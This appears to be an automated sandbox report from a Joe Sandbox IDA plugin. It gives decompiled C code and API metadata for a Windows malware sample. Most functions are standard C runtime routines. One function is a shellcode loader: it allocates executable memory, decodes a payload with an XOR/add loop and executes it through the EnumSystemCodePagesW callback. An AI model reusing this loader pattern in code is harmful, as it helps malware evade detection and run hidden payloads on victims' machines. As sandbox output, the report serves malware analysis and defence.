7072 e171c5 7067->7072 7073 e17227 7068->7073 7069->7048 7070->7052 7071->7043 7074 e18d1f ___free_lconv_num 58 API calls 7072->7074 7075 e14841 _free 58 API calls 7073->7075 7074->7056 7075->7049 7076->7062 7077->7046 7081 e145a9 LeaveCriticalSection 7078->7081 7080 e14fd1 7080->7033 7081->7080 7083 e1200b LeaveCriticalSection 7082->7083 7084 e11fec 7082->7084 7083->6624 7084->7083 7085 e11ff3 7084->7085 7088 e145a9 LeaveCriticalSection 7085->7088 7087 e12008 7087->6624 7088->7087 7090 e114ae __commit 7089->7090 7091 e114f1 7090->7091 7092 e114e9 __commit 7090->7092 7097 e114c4 _memset 7090->7097 7102 e11f6e 7091->7102 7092->6572 7095 e11cd3 __cftoe_l 58 API calls 7098 e114de 7095->7098 7097->7095 7100 e11e99 __cftoe_l 9 API calls 7098->7100 7100->7092 7103 e11fa0 EnterCriticalSection 7102->7103 7104 e11f7e 7102->7104 7105 e114f7 7103->7105 7104->7103 7106 e11f86 7104->7106 7108 e112c2 7105->7108 7107 e1443f __lock 58 API calls 7106->7107 7107->7105 7111 e112dd _memset 7108->7111 7114 e112f8 7108->7114 7109 e112e8 7110 e11cd3 __cftoe_l 58 API calls 7109->7110 7112 e112ed 7110->7112 7111->7109 7111->7114 7119 e11338 7111->7119 7113 e11e99 __cftoe_l 9 API calls 7112->7113 7113->7114 7122 e1152b 7114->7122 7116 e11449 _memset 7120 e11cd3 __cftoe_l 58 API calls 7116->7120 7119->7114 7119->7116 7125 e12883 7119->7125 7132 e12a3a 7119->7132 7200 e12762 7119->7200 7220 e128a7 7119->7220 7120->7112 7123 e11fdd __wfsopen 2 API calls 7122->7123 7124 e11531 7123->7124 7124->7092 7126 e128a2 7125->7126 7127 e1288d 7125->7127 7126->7119 7128 e11cd3 __cftoe_l 58 API calls 7127->7128 7129 e12892 7128->7129 7130 e11e99 __cftoe_l 9 API calls 7129->7130 7131 e1289d 7130->7131 7131->7119 7133 e12a72 7132->7133 7134 e12a5b 7132->7134 7136 e131aa 7133->7136 7141 e12aac 7133->7141 7135 e11c9f __commit 58 API calls 7134->7135 7138 e12a60 7135->7138 7137 e11c9f __commit 58 API calls 7136->7137 7139 e131af 7137->7139 7140 e11cd3 __cftoe_l 58 API calls 7138->7140 7143 e11cd3 __cftoe_l 58 

              Control-flow Graph

              C-Code - Quality: 69%
              			E00E112C2(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
              				char* _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				void* __ebx;
              				void* __esi;
              				signed int _t74;
              				signed int _t78;
              				char _t81;
              				signed int _t86;
              				signed int _t88;
              				signed int _t91;
              				signed int _t94;
              				signed int _t97;
              				signed int _t98;
              				char* _t99;
              				signed int _t100;
              				signed int _t102;
              				signed int _t103;
              				signed int _t104;
              				char* _t110;
              				signed int _t113;
              				signed int _t117;
              				signed int _t119;
              				void* _t120;
              
              				_t99 = _a4;
              				_t74 = _a8;
              				_v8 = _t99;
              				_v12 = _t74;
              				if(_a12 == 0) {
              					L5:
              					return 0;
              				}
              				_t97 = _a16;
              				if(_t97 == 0) {
              					goto L5;
              				}
              				if(_t99 != 0) {
              					_t119 = _a20;
              					__eflags = _t119;
              					if(_t119 == 0) {
              						L9:
              						__eflags = _a8 - 0xffffffff;
              						if(_a8 != 0xffffffff) {
              							_t74 = E00E11540(_t99, 0, _a8);
              							_t120 = _t120 + 0xc;
              						}
              						__eflags = _t119;
              						if(_t119 == 0) {
              							goto L3;
              						} else {
              							_t78 = _t74 | 0xffffffff;
              							__eflags = _t97 - _t78 / _a12;
              							if(_t97 > _t78 / _a12) {
              								goto L3;
              							}
              							L13:
              							_t117 = _a12 * _t97;
              							__eflags =  *(_t119 + 0xc) & 0x0000010c;
              							_t98 = _t117;
              							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
              								_t100 = 0x1000;
              							} else {
              								_t100 =  *(_t119 + 0x18);
              							}
              							_v16 = _t100;
              							__eflags = _t117;
              							if(_t117 == 0) {
              								L41:
              								return _a16;
              							} else {
              								do {
              									__eflags =  *(_t119 + 0xc) & 0x0000010c;
              									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
              										L24:
              										__eflags = _t98 - _t100;
              										if(_t98 < _t100) {
              											_t81 = E00E12762(_t98, _t119, _t119); // executed
              											__eflags = _t81 - 0xffffffff;
              											if(_t81 == 0xffffffff) {
              												L46:
              												return (_t117 - _t98) / _a12;
              											}
              											_t102 = _v12;
              											__eflags = _t102;
              											if(_t102 == 0) {
              												L42:
              												__eflags = _a8 - 0xffffffff;
              												if(_a8 != 0xffffffff) {
              													E00E11540(_a4, 0, _a8);
              												}
              												 *((intOrPtr*)(E00E11CD3())) = 0x22;
              												L4:
              												E00E11E99();
              												goto L5;
              											}
              											_t110 = _v8;
              											 *_t110 = _t81;
              											_t98 = _t98 - 1;
              											_v8 = _t110 + 1;
              											_t103 = _t102 - 1;
              											__eflags = _t103;
              											_v12 = _t103;
              											_t100 =  *(_t119 + 0x18);
              											_v16 = _t100;
              											goto L40;
              										}
              										__eflags = _t100;
              										if(_t100 == 0) {
              											_t86 = 0x7fffffff;
              											__eflags = _t98 - 0x7fffffff;
              											if(_t98 <= 0x7fffffff) {
              												_t86 = _t98;
              											}
              										} else {
              											__eflags = _t98 - 0x7fffffff;
              											if(_t98 <= 0x7fffffff) {
              												_t44 = _t98 % _t100;
              												__eflags = _t44;
              												_t113 = _t44;
              												_t91 = _t98;
              											} else {
              												_t113 = 0x7fffffff % _t100;
              												_t91 = 0x7fffffff;
              											}
              											_t86 = _t91 - _t113;
              										}
              										__eflags = _t86 - _v12;
              										if(_t86 > _v12) {
              											goto L42;
              										} else {
              											_push(_t86);
              											_push(_v8);
              											_push(E00E12883(_t119)); // executed
              											_t88 = E00E12A3A(); // executed
              											_t120 = _t120 + 0xc;
              											__eflags = _t88;
              											if(_t88 == 0) {
              												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
              												goto L46;
              											}
              											__eflags = _t88 - 0xffffffff;
              											if(_t88 == 0xffffffff) {
              												L45:
              												_t64 = _t119 + 0xc;
              												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
              												__eflags =  *_t64;
              												goto L46;
              											}
              											_t98 = _t98 - _t88;
              											__eflags = _t98;
              											L36:
              											_v8 = _v8 + _t88;
              											_v12 = _v12 - _t88;
              											_t100 = _v16;
              											goto L40;
              										}
              									}
              									_t94 =  *(_t119 + 4);
              									_v20 = _t94;
              									__eflags = _t94;
              									if(__eflags == 0) {
              										goto L24;
              									}
              									if(__eflags < 0) {
              										goto L45;
              									}
              									__eflags = _t98 - _t94;
              									if(_t98 < _t94) {
              										_t94 = _t98;
              										_v20 = _t98;
              									}
              									_t104 = _v12;
              									__eflags = _t94 - _t104;
              									if(_t94 > _t104) {
              										goto L42;
              									} else {
              										E00E128A7(_v8, _t104,  *_t119, _t94);
              										_t88 = _v20;
              										_t120 = _t120 + 0x10;
              										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
              										_t98 = _t98 - _t88;
              										 *_t119 =  *_t119 + _t88;
              										goto L36;
              									}
              									L40:
              									__eflags = _t98;
              								} while (_t98 != 0);
              								goto L41;
              							}
              						}
              					}
              					_t74 = (_t74 | 0xffffffff) / _a12;
              					__eflags = _t97 - _t74;
              					if(_t97 <= _t74) {
              						goto L13;
              					}
              					goto L9;
              				}
              				L3:
              				 *((intOrPtr*)(E00E11CD3())) = 0x16;
              				goto L4;
              			}


              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
              • String ID:
              • API String ID: 1559183368-0
              • Opcode ID: 7d16c50f304548ff61ccfb1f943ff7faf915b09239512d226c9cd4ed4bc762dc
              • Instruction ID: db6e97dcb2303dbdc70d5a3b8f4296e61b3e584acf5095c4c76aafe3c8e9ab21
              • Opcode Fuzzy Hash: 7d16c50f304548ff61ccfb1f943ff7faf915b09239512d226c9cd4ed4bc762dc
              • Instruction Fuzzy Hash: 6551E770A00305DBCB249FA9C8806EEB7A6AF40724F2493ADFA35B66D4D7709DD0DB41
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 92%
              			E00E11000(void* __ecx, void* __eflags, intOrPtr _a12) {
              				intOrPtr _v8;
              				void* __ebx;
              				void* __edi;
              				intOrPtr _t6;
              				void* _t7;
              				_Unknown_base(*)()* _t8;
              				void* _t23;
              				_Unknown_base(*)()* _t24;
              				void* _t29;
              				void* _t30;
              				void* _t31;
              				intOrPtr* _t37;
              
              				_push(_t23);
              				_t31 = 0; // executed
              				_t6 = E00E11151(_t23, _t29, 0, 0x17d78400); // executed
              				 *_t37 = 0xe23000;
              				_v8 = _t6;
              				_t7 = E00E111E3(_a12, _t30); // executed
              				_t8 = VirtualAlloc(0, 0x148a, 0x3000, 0x40); // executed
              				_t24 = _t8;
              				E00E11487(_t24, 0x148a, 1, _t7); // executed
              				_t10 = _v8;
              				if(_v8 != 0) {
              					E00E11540(_t10, 0xcb, 0x17d78400);
              					do {
              						 *(_t24 + _t31) = (((( *(_t24 + _t31) ^ 0x0000009d) + 0x00000001 ^ 0x000000d0) + 0x0000007f ^ 0x000000c5) + 0x00000001 ^ 0x000000b7) + 0x32;
              						_t31 = _t31 + 1;
              					} while (_t31 < 0x148a);
              					EnumSystemCodePagesW(_t24, 0); // executed
              				}
              				return 0;
              			}


              APIs
              • _malloc.LIBCMT ref: 00E1100E
                • Part of subcall function 00E11151: __FF_MSGBANNER.LIBCMT ref: 00E11168
                • Part of subcall function 00E11151: __NMSG_WRITE.LIBCMT ref: 00E1116F
                • Part of subcall function 00E11151: RtlAllocateHeap.NTDLL(00B50000,00000000,00000001,00000000,00000000,00000000,?,00E148D7,00000000,00000000,00000000,00000000,?,00E14509,00000018,00E22280), ref: 00E11194
                • Part of subcall function 00E111E3: __wfsopen.LIBCMT ref: 00E111EE
              • VirtualAlloc.KERNELBASE(00000000,0000148A,00003000,00000040), ref: 00E11036
              • __fread_nolock.LIBCMT ref: 00E11048
              • _memset.LIBCMT ref: 00E11062
              • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 00E11088
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
              • String ID:
              • API String ID: 3693343133-0
              • Opcode ID: c8205ae9f1c4967ab717212f731c0c687b37a332009c5680d208f2a0fee8b9b5
              • Instruction ID: 5c372068dd45a11ccc246e57f51a2a34b8f7bc3f86af1f7d8f098d327493c5ed
              • Opcode Fuzzy Hash: c8205ae9f1c4967ab717212f731c0c687b37a332009c5680d208f2a0fee8b9b5
              • Instruction Fuzzy Hash: 2B014C71A053047BF72027715C4BFDF7B98DB55758F201491FA01B7182E5F499829274
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 89%
              			E00E114A2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t16;
              				intOrPtr _t19;
              				intOrPtr _t29;
              				void* _t32;
              
              				_push(0xc);
              				_push(0xe22170);
              				E00E12410(__ebx, __edi, __esi);
              				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
              				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
              					L6:
              					_t16 = 0;
              				} else {
              					_t31 =  *((intOrPtr*)(_t32 + 0x18));
              					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
              						E00E11F6E(_t31);
              						 *((intOrPtr*)(_t32 - 4)) = 0;
              						_t19 = E00E112C2( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
              						_t29 = _t19;
              						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
              						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
              						E00E1152B(_t31);
              						_t16 = _t29;
              					} else {
              						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
              							E00E11540( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
              						}
              						 *((intOrPtr*)(E00E11CD3())) = 0x16;
              						E00E11E99();
              						goto L6;
              					}
              				}
              				return E00E12455(_t16);
              			}








              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __lock_file_memset
              • String ID:
              • API String ID: 26237723-0
              • Opcode ID: 1b287eb6516a61880c8cc76e644dd60dfac4c9e867be5a262b966aba13f83cfe
              • Instruction ID: 96071e893695b76e386675bc21c71c910502bc990a016a18a5271f01b51ced0b
              • Opcode Fuzzy Hash: 1b287eb6516a61880c8cc76e644dd60dfac4c9e867be5a262b966aba13f83cfe
              • Instruction Fuzzy Hash: D101F771801209EBCF21AFA5DC018DE7BF1AF80760F10A199FB3476191E7358AA2DB91
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 102 e111e3-e111f7 call e111f8
              C-Code - Quality: 25%
              			E00E111E3(intOrPtr _a4, intOrPtr _a8) {
              				void* __ebp;
              				void* _t3;
              				void* _t4;
              				void* _t5;
              				void* _t6;
              				void* _t9;
              
              				_push(0x40);
              				_push(_a8);
              				_push(_a4);
              				_t3 = E00E111F8(_t4, _t5, _t6, _t9); // executed
              				return _t3;
              			}










              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __wfsopen
              • String ID:
              • API String ID: 197181222-0
              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
              • Instruction ID: 05dcda55346e0054598a578fe5cfd7a083e577ac69570038a5c4355147036482
              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
              • Instruction Fuzzy Hash: 81B092B254020C77CF012A82EC02A897B599B40660F008060FF1C28171A673A6A49689
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00E143DC(struct _EXCEPTION_POINTERS* _a4) {
              
              				SetUnhandledExceptionFilter(0);
              				return UnhandledExceptionFilter(_a4);
              			}




              APIs
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E11E3A,?,?,?,00000000), ref: 00E143E1
              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00E143EA
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 61457ff062c6cbefd58870b668cf4ce4b00f98292d0846569f49146559ec9ab6
              • Instruction ID: 0e609f2afc9b47249f1728fbb4e1fa57a96e22528cc791f96090dc3f15887469
              • Opcode Fuzzy Hash: 61457ff062c6cbefd58870b668cf4ce4b00f98292d0846569f49146559ec9ab6
              • Instruction Fuzzy Hash: 4FB09235285208BFCB002F92EC0DBAC3F28EB14752F008410FA0D54260CB7254148A92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00E143AB(_Unknown_base(*)()* _a4) {
              
              				return SetUnhandledExceptionFilter(_a4);
              			}




              APIs
              • SetUnhandledExceptionFilter.KERNEL32(?,?,00E13457,00E1340C), ref: 00E143B1
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: dd9a5dd78e810a1764713beebccc799d2c10a7ccf9907da7143cbbe6d3b89bbe
              • Instruction ID: a69c487fe153b0cd5fa7a8809c7a0dd5192f3d9e949bf7c59f9a386e30a0be3b
              • Opcode Fuzzy Hash: dd9a5dd78e810a1764713beebccc799d2c10a7ccf9907da7143cbbe6d3b89bbe
              • Instruction Fuzzy Hash: 1FA0113008020CBB8A002F82EC088A83F2CEB002A0B008020F80C00220CB32A8208A82
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E00E138B8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				signed int _t82;
              				signed int _t86;
              				long _t90;
              				void* _t91;
              				signed int _t94;
              				signed int _t98;
              				signed int _t99;
              				signed char _t103;
              				signed int _t105;
              				intOrPtr _t106;
              				intOrPtr* _t109;
              				signed char _t111;
              				long _t119;
              				intOrPtr _t129;
              				signed int _t133;
              				void* _t135;
              				signed int _t138;
              				void** _t139;
              				signed int _t141;
              				signed int _t142;
              				signed int _t143;
              				signed int _t147;
              				signed int _t149;
              				void* _t150;
              				signed int _t154;
              				void* _t155;
              				void* _t156;
              
              				_push(0x64);
              				_push(0xe22260);
              				E00E12410(__ebx, __edi, __esi);
              				E00E1443F(0xb);
              				 *((intOrPtr*)(_t155 - 4)) = 0;
              				_push(0x40);
              				_t141 = 0x20;
              				_push(_t141);
              				_t82 = E00E14879();
              				_t133 = _t82;
              				 *(_t155 - 0x24) = _t133;
              				if(_t133 != 0) {
              					 *0xe24848 = _t82;
              					 *0xe250e4 = _t141;
              					while(1) {
              						__eflags = _t133 - 0x800 + _t82;
              						if(_t133 >= 0x800 + _t82) {
              							break;
              						}
              						 *((short*)(_t133 + 4)) = 0xa00;
              						 *_t133 =  *_t133 | 0xffffffff;
              						 *((intOrPtr*)(_t133 + 8)) = 0;
              						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
              						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
              						 *((short*)(_t133 + 0x25)) = 0xa0a;
              						 *((intOrPtr*)(_t133 + 0x38)) = 0;
              						 *((char*)(_t133 + 0x34)) = 0;
              						_t133 = _t133 + 0x40;
              						 *(_t155 - 0x24) = _t133;
              						_t82 =  *0xe24848; // 0xb727e0
              					}
              					GetStartupInfoW(_t155 - 0x74);
              					__eflags =  *((short*)(_t155 - 0x42));
              					if( *((short*)(_t155 - 0x42)) == 0) {
              						L27:
              						_t129 = 0xfffffffe;
              						L28:
              						_t142 = 0;
              						__eflags = 0;
              						while(1) {
              							 *(_t155 - 0x2c) = _t142;
              							__eflags = _t142 - 3;
              							if(_t142 >= 3) {
              								break;
              							}
              							_t147 = (_t142 << 6) +  *0xe24848;
              							 *(_t155 - 0x24) = _t147;
              							__eflags =  *_t147 - 0xffffffff;
              							if( *_t147 == 0xffffffff) {
              								L33:
              								 *(_t147 + 4) = 0x81;
              								__eflags = _t142;
              								if(_t142 != 0) {
              									_t65 = _t142 - 1; // -1
              									asm("sbb eax, eax");
              									_t90 =  ~_t65 + 0xfffffff5;
              									__eflags = _t90;
              								} else {
              									_t90 = 0xfffffff6;
              								}
              								_t91 = GetStdHandle(_t90);
              								 *(_t155 - 0x1c) = _t91;
              								__eflags = _t91 - 0xffffffff;
              								if(_t91 == 0xffffffff) {
              									L45:
              									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
              									 *_t147 = _t129;
              									_t94 =  *0xe26100;
              									__eflags = _t94;
              									if(_t94 != 0) {
              										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
              									}
              									goto L47;
              								} else {
              									__eflags = _t91;
              									if(_t91 == 0) {
              										goto L45;
              									}
              									_t98 = GetFileType(_t91);
              									__eflags = _t98;
              									if(_t98 == 0) {
              										goto L45;
              									}
              									 *_t147 =  *(_t155 - 0x1c);
              									_t99 = _t98 & 0x000000ff;
              									__eflags = _t99 - 2;
              									if(_t99 != 2) {
              										__eflags = _t99 - 3;
              										if(_t99 != 3) {
              											L44:
              											_t71 = _t147 + 0xc; // -14829628
              											E00E140B2(_t71, 0xfa0, 0);
              											_t156 = _t156 + 0xc;
              											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
              											L47:
              											_t142 = _t142 + 1;
              											continue;
              										}
              										_t103 =  *(_t147 + 4) | 0x00000008;
              										__eflags = _t103;
              										L43:
              										 *(_t147 + 4) = _t103;
              										goto L44;
              									}
              									_t103 =  *(_t147 + 4) | 0x00000040;
              									goto L43;
              								}
              							}
              							__eflags =  *_t147 - _t129;
              							if( *_t147 == _t129) {
              								goto L33;
              							}
              							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
              							goto L47;
              						}
              						 *((intOrPtr*)(_t155 - 4)) = _t129;
              						E00E13B63();
              						_t86 = 0;
              						__eflags = 0;
              						L49:
              						return E00E12455(_t86);
              					}
              					_t105 =  *(_t155 - 0x40);
              					__eflags = _t105;
              					if(_t105 == 0) {
              						goto L27;
              					}
              					_t135 =  *_t105;
              					 *(_t155 - 0x1c) = _t135;
              					_t106 = _t105 + 4;
              					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
              					 *(_t155 - 0x20) = _t106 + _t135;
              					__eflags = _t135 - 0x800;
              					if(_t135 >= 0x800) {
              						_t135 = 0x800;
              						 *(_t155 - 0x1c) = 0x800;
              					}
              					_t149 = 1;
              					__eflags = 1;
              					 *(_t155 - 0x30) = 1;
              					while(1) {
              						__eflags =  *0xe250e4 - _t135; // 0x20
              						if(__eflags >= 0) {
              							break;
              						}
              						_t138 = E00E14879(_t141, 0x40);
              						 *(_t155 - 0x24) = _t138;
              						__eflags = _t138;
              						if(_t138 != 0) {
              							0xe24848[_t149] = _t138;
              							 *0xe250e4 =  *0xe250e4 + _t141;
              							__eflags =  *0xe250e4;
              							while(1) {
              								__eflags = _t138 - 0x800 + 0xe24848[_t149];
              								if(_t138 >= 0x800 + 0xe24848[_t149]) {
              									break;
              								}
              								 *((short*)(_t138 + 4)) = 0xa00;
              								 *_t138 =  *_t138 | 0xffffffff;
              								 *((intOrPtr*)(_t138 + 8)) = 0;
              								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
              								 *((short*)(_t138 + 0x25)) = 0xa0a;
              								 *((intOrPtr*)(_t138 + 0x38)) = 0;
              								 *((char*)(_t138 + 0x34)) = 0;
              								_t138 = _t138 + 0x40;
              								 *(_t155 - 0x24) = _t138;
              							}
              							_t149 = _t149 + 1;
              							 *(_t155 - 0x30) = _t149;
              							_t135 =  *(_t155 - 0x1c);
              							continue;
              						}
              						_t135 =  *0xe250e4; // 0x20
              						 *(_t155 - 0x1c) = _t135;
              						break;
              					}
              					_t143 = 0;
              					 *(_t155 - 0x2c) = 0;
              					_t129 = 0xfffffffe;
              					_t109 =  *((intOrPtr*)(_t155 - 0x28));
              					_t139 =  *(_t155 - 0x20);
              					while(1) {
              						__eflags = _t143 - _t135;
              						if(_t143 >= _t135) {
              							goto L28;
              						}
              						_t150 =  *_t139;
              						__eflags = _t150 - 0xffffffff;
              						if(_t150 == 0xffffffff) {
              							L22:
              							_t143 = _t143 + 1;
              							 *(_t155 - 0x2c) = _t143;
              							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
              							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
              							_t139 =  &(_t139[1]);
              							 *(_t155 - 0x20) = _t139;
              							continue;
              						}
              						__eflags = _t150 - _t129;
              						if(_t150 == _t129) {
              							goto L22;
              						}
              						_t111 =  *_t109;
              						__eflags = _t111 & 0x00000001;
              						if((_t111 & 0x00000001) == 0) {
              							goto L22;
              						}
              						__eflags = _t111 & 0x00000008;
              						if((_t111 & 0x00000008) != 0) {
              							L20:
              							_t154 = ((_t143 & 0x0000001f) << 6) + 0xe24848[_t143 >> 5];
              							 *(_t155 - 0x24) = _t154;
              							 *_t154 =  *_t139;
              							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
              							_t37 = _t154 + 0xc; // 0xd
              							E00E140B2(_t37, 0xfa0, 0);
              							_t156 = _t156 + 0xc;
              							_t38 = _t154 + 8;
              							 *_t38 =  *(_t154 + 8) + 1;
              							__eflags =  *_t38;
              							_t139 =  *(_t155 - 0x20);
              							L21:
              							_t135 =  *(_t155 - 0x1c);
              							goto L22;
              						}
              						_t119 = GetFileType(_t150);
              						_t139 =  *(_t155 - 0x20);
              						__eflags = _t119;
              						if(_t119 == 0) {
              							goto L21;
              						}
              						goto L20;
              					}
              					goto L28;
              				}
              				_t86 = E00E12610(_t155, 0xe23400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
              				goto L49;
              			}































              APIs
              • __lock.LIBCMT ref: 00E138C6
                • Part of subcall function 00E1443F: __mtinitlocknum.LIBCMT ref: 00E14451
                • Part of subcall function 00E1443F: EnterCriticalSection.KERNEL32(00000000,?,00E137BB,0000000D), ref: 00E1446A
              • __calloc_crt.LIBCMT ref: 00E138D7
                • Part of subcall function 00E14879: __calloc_impl.LIBCMT ref: 00E14888
              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E138F2
              • GetStartupInfoW.KERNEL32(?,00E22260,00000064,00E11664,00E22190,00000014), ref: 00E1394B
              • __calloc_crt.LIBCMT ref: 00E13996
              • GetFileType.KERNEL32(00000001), ref: 00E139DF
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
              • String ID:
              • API String ID: 2772871689-0
              • Opcode ID: 8d6748c4b0b5d18005011c8eead7495842b3154eda36777b89fbb00ae4c9b7c1
              • Instruction ID: 2958a021a691dcd6b18f8b9739dc229ccbab23f6871ba39901228fd0587c188c
